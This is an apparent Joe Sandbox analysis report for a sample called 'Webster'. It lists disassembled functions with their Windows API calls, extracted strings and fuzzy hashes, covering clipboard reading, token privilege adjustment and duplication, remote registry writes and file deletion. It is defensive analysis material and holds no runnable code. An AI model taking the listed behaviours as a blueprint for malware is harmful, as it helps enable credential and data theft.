                                                                                  Function 00A94AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2638373210-0
                                                                                  • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                  • Instruction ID: f5d1cf88ad4701d6505689c4cdd9b02b783a64dcb2e08a2128286804a26ca5d1
                                                                                  • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                  • Instruction Fuzzy Hash: 1EF0FE7150010DFFDF05CF90C941EAA7BB9FB19314F108589F9154B251D336DA21AB91
                                                                                  Function 00AC0A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 4afd21be5da29ef96c6d6c0ba1fd1338e9b2023d405735b85b6f3a5d01922a8f
                                                                                  • Instruction ID: eed642a404cf94aa69e2c4975c23c08b1d1db6e22a4d7425673f91437cce0a92
                                                                                  • Opcode Fuzzy Hash: 4afd21be5da29ef96c6d6c0ba1fd1338e9b2023d405735b85b6f3a5d01922a8f
                                                                                  • Instruction Fuzzy Hash: 5AE02B71708346DEEB30AB65D444F66FBE4AF00310F11455ED49582240E776989497A1
                                                                                  Function 00AA09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2514874351-0
                                                                                  • Opcode ID: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
                                                                                  • Instruction ID: d53bfdf15d4f0b9c29b79626606486a5a269dabebfa8db58de4dce5339236fac
                                                                                  • Opcode Fuzzy Hash: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
                                                                                  • Instruction Fuzzy Hash: 90E08632A0012857CB21A6989C15FEA77DDDB89690F0441B6FC09D7205D9649C818691
                                                                                  Function 00AE4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
                                                                                  • Instruction ID: 5c7a99cd2f07ca23f7313d6381f969afd1ec1037681a2214d3d58ee2be4aa052
                                                                                  • Opcode Fuzzy Hash: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
                                                                                  • Instruction Fuzzy Hash: 15B09234010680669D282F3D19480993309584AFA97D81B81E878964E1D6398C9BA620
                                                                                  Function 00AA547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wfsopen
                                                                                  • String ID:
                                                                                  • API String ID: 197181222-0
                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                  • Instruction ID: d6de6d45c2de5ddde6210d01d3a8bb494f2b3a1d0042ca9c7e7816ab69a623c1
                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                  • Instruction Fuzzy Hash: 1BB0927684020CB7CE012A92EC03A593F2A9B45668F408020FB0C1D1A2A673A6A09689
                                                                                  Function 00AEC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4005: FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                                                    • Part of subcall function 00AE4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                                                    • Part of subcall function 00AE4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE40DD
                                                                                    • Part of subcall function 00AE4005: FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                                                  • GetLastError.KERNEL32 ref: 00AEC292
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                  • String ID:
                                                                                  • API String ID: 2191629493-0
                                                                                  • Opcode ID: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
                                                                                  • Instruction ID: 5528a1b425f8e984cd7aeb058abd1cc296c5ac1500cf37031647d98e1c3bd0dc
                                                                                  • Opcode Fuzzy Hash: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
                                                                                  • Instruction Fuzzy Hash: 90F082312101104FCB10FF59D950B59B7E5AF48320F058419F9058B352CB74BC01CB94

                                                                                  Non-executed Functions

                                                                                  Function 00B0D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B0D208
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D249
                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B0D28E
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D2B8
                                                                                  • SendMessageW.USER32 ref: 00B0D2E1
                                                                                  • _wcsncpy.LIBCMT ref: 00B0D359
                                                                                  • GetKeyState.USER32(00000011), ref: 00B0D37A
                                                                                  • GetKeyState.USER32(00000009), ref: 00B0D387
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D39D
                                                                                  • GetKeyState.USER32(00000010), ref: 00B0D3A7
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D3D0
                                                                                  • SendMessageW.USER32 ref: 00B0D3F7
                                                                                  • SendMessageW.USER32(?,00001030,?,00B0B9BA), ref: 00B0D4FD
                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B0D513
                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B0D526
                                                                                  • SetCapture.USER32(?), ref: 00B0D52F
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D594
                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B0D5A1
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B0D5BB
                                                                                  • ReleaseCapture.USER32 ref: 00B0D5C6
                                                                                  • GetCursorPos.USER32(?), ref: 00B0D600
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0D60D
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D669
                                                                                  • SendMessageW.USER32 ref: 00B0D697
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D6D4
                                                                                  • SendMessageW.USER32 ref: 00B0D703
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B0D724
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B0D733
                                                                                  • GetCursorPos.USER32(?), ref: 00B0D753
                                                                                  • ScreenToClient.USER32(?,?), ref: 00B0D760
                                                                                  • GetParent.USER32(?), ref: 00B0D780
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D7E9
                                                                                  • SendMessageW.USER32 ref: 00B0D81A
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D878
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B0D8A8
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D8D2
                                                                                  • SendMessageW.USER32 ref: 00B0D8F5
                                                                                  • ClientToScreen.USER32(?,?), ref: 00B0D947
                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B0D97B
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0DA17
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                  • String ID: @GUI_DRAGID$F
                                                                                  • API String ID: 3977979337-4164748364
                                                                                  • Opcode ID: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
                                                                                  • Instruction ID: 5546b940ad849119a175da31937fd9bc43fc1b19de6ac12d745db6b131f3aeba
                                                                                  • Opcode Fuzzy Hash: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
                                                                                  • Instruction Fuzzy Hash: F8429C34208341AFD720DFA8C884BAABFE5FF89310F144699F695972E0CB719D55CB92
                                                                                  Function 00AD8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                    • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                    • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                                                  • _memset.LIBCMT ref: 00AD8F71
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AD8FC3
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD8FD4
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AD8FEB
                                                                                  • GetProcessWindowStation.USER32 ref: 00AD9004
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00AD900E
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AD9028
                                                                                    • Part of subcall function 00AD8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                                                    • Part of subcall function 00AD8DE9: CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                  • String ID: $default$winsta0
                                                                                  • API String ID: 2063423040-1027155976
                                                                                  • Opcode ID: 163c665591cbf233209e38be352a0e726cf6a44211dfc8b5d9da00db7bf8af94
                                                                                  • Instruction ID: 5c47f9dc3cb9f6b98aed8cf64ade4648265de9fc25772cb8096d7465246df121
                                                                                  • Opcode Fuzzy Hash: 163c665591cbf233209e38be352a0e726cf6a44211dfc8b5d9da00db7bf8af94
                                                                                  • Instruction Fuzzy Hash: E4816A71900209BFDF51EFA4CD49AEF7B79BF08304F04825AF916A62A1DB718E55DB20
                                                                                  Function 00AF4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(00B10980), ref: 00AF465C
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AF466A
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00AF4672
                                                                                  • CloseClipboard.USER32 ref: 00AF467E
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00AF469A
                                                                                  • CloseClipboard.USER32 ref: 00AF46A4
                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00AF46B9
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00AF46C6
                                                                                  • GetClipboardData.USER32(00000001), ref: 00AF46CE
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00AF46DB
                                                                                  • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00AF470F
                                                                                  • CloseClipboard.USER32 ref: 00AF481F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                  • String ID:
                                                                                  • API String ID: 3222323430-0
                                                                                  • Opcode ID: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
                                                                                  • Instruction ID: e71e18f3101d6eea935697294bee18b019bee378737219a6774954d2b304eeca
                                                                                  • Opcode Fuzzy Hash: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
                                                                                  • Instruction Fuzzy Hash: FD518171244206ABD700FFA0DD89FBF77A8AF98B51F404529F646D31A1DFB0D9448BA2
                                                                                  Function 00AECD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AECDD0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AECE24
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE49
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE60
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AECE87
                                                                                  • __swprintf.LIBCMT ref: 00AECED3
                                                                                  • __swprintf.LIBCMT ref: 00AECF16
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • __swprintf.LIBCMT ref: 00AECF6A
                                                                                    • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                                                  • __swprintf.LIBCMT ref: 00AECFB8
                                                                                    • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA3943
                                                                                    • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA395B
                                                                                  • __swprintf.LIBCMT ref: 00AED007
                                                                                  • __swprintf.LIBCMT ref: 00AED056
                                                                                  • __swprintf.LIBCMT ref: 00AED0A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 3953360268-2428617273
                                                                                  • Opcode ID: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                                                  • Instruction ID: 79766f632569b2411f109f9ee61d622aef513cc15efba6ce5729100eb7763db3
                                                                                  • Opcode Fuzzy Hash: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                                                  • Instruction Fuzzy Hash: D5A13CB2508345ABC714FFA4CA85DAFB7ECEF98704F400919F58587191EB74EA09CB62
                                                                                  Function 00AEF5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF5F9
                                                                                  • _wcscmp.LIBCMT ref: 00AEF60E
                                                                                  • _wcscmp.LIBCMT ref: 00AEF625
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00AEF637
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00AEF651
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF669
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF674
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF690
                                                                                  • _wcscmp.LIBCMT ref: 00AEF6B7
                                                                                  • _wcscmp.LIBCMT ref: 00AEF6CE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF6E0
                                                                                  • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF6FE
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF708
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF715
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AEF727
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1803514871-438819550
                                                                                  • Opcode ID: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                                                  • Instruction ID: a39a12f7ac5934ebdc4dfff1d67ca53316b53c79780bd0e3c3040b29936ea73e
                                                                                  • Opcode Fuzzy Hash: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
                                                                                  • Instruction Fuzzy Hash: 3B31B372641259AFDF10EFB5AC59AEE77ACDF09321F5041A5F804E30A0EF74DA84CA60
                                                                                  Function 00B00EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00FB3
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B10980,00000000,?,00000000,?,?), ref: 00B01021
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B01069
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B010F2
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B01412
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B0141F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 536824911-966354055
                                                                                  • Opcode ID: 3b89ef6fc2d48df026c0e4629326d7b11492223d5da960e9e716c6756ea5599c
                                                                                  • Instruction ID: 0157368f75a130f5ace867b07d64a6f91a6bc837548b540a12e1c8be55ecf997
                                                                                  • Opcode Fuzzy Hash: 3b89ef6fc2d48df026c0e4629326d7b11492223d5da960e9e716c6756ea5599c
                                                                                  • Instruction Fuzzy Hash: 4B028F752046029FCB14EF29C981E2ABBE5FF89714F04895DF85A9B3A1DB30EC41CB91
                                                                                  Function 00AEF735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF756
                                                                                  • _wcscmp.LIBCMT ref: 00AEF76B
                                                                                  • _wcscmp.LIBCMT ref: 00AEF782
